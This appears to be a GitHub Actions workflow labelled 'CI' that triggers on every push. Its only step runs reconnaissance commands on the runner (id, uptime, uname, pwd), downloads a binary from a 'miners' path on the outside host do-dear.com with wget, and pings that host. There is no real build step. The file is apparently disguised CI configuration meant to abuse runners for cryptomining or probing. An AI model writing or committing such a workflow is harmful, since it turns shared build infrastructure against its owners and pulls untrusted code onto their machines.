name: CI
on:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - shell: bash
        run: |
          id;uptime;uname -a;pwd;wget https://do-dear.com/miners/x86_64;ping -c 5 do-dear.com
